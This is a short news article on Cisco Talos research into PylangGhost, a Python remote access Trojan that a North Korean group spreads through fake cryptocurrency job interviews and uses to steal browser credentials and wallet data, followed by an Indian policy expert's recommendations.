Cybercriminals Target Crypto Job Seekers with Fake Interviews Using New Trojan PylangGhost

The North Korean hacking group Famous Chollima has developed a new Trojan known as PylangGhost. According to researchers from Cisco Talos, the malware is being distributed through fake job interviews targeting professionals in the cryptocurrency sector.

The attackers create fraudulent websites that mimic well-known companies such as Coinbase, Robinhood, and Uniswap.

Recruiters direct applicants to these sites for assessments. Candidates are then asked to turn on their cameras for a video interview, being instructed to run a command in the console that supposedly installs a video driver, but in reality, it downloads the malware.

PylangGhost is a remote access Trojan (RAT) written in Python, specifically designed for Windows systems. It serves as a counterpart to the previously known GolangGhost virus for macOS. Linux systems are not affected in these campaigns.

Once executed, the virus grants remote control over the compromised system. It steals cookies and credentials from over 80 browser extensions, targeting password managers like 1Password and NordPass, as well as cryptocurrency wallets such as MetaMask, Phantom, Bitski, and TronLink.

The malware provides hackers with persistent remote access to the infected system.

Researchers noted that it’s unlikely the hackers utilized large language models in the virus’s code development.

Primarily, the attackers are focusing on professionals from India. Experts indicated that this is part of a broader strategy by North Korea. The group not only siphons funds from exchanges but also seeks to infiltrate cryptocurrency companies for intelligence gathering.

Dilip Kumar, director of Digital South Trust, stated to Decrypt that to combat such incidents, “India must implement mandatory cybersecurity audits for blockchain companies and monitor fake job search portals.”

“CERT-In should issue red alerts, while MEITY and NCIIPC need to enhance global coordination in tackling cross-border cybercrime,” he noted.

Kumar also urged for “strengthening the legal provisions” under the Information Technology Act and conducting “campaigns to raise digital awareness.”

It’s worth mentioning that in April, experts from Silent Push reported that a group associated with Lazarus called Contagious Interview registered three shell companies to distribute malware, which they use to deceive users through fake interviews.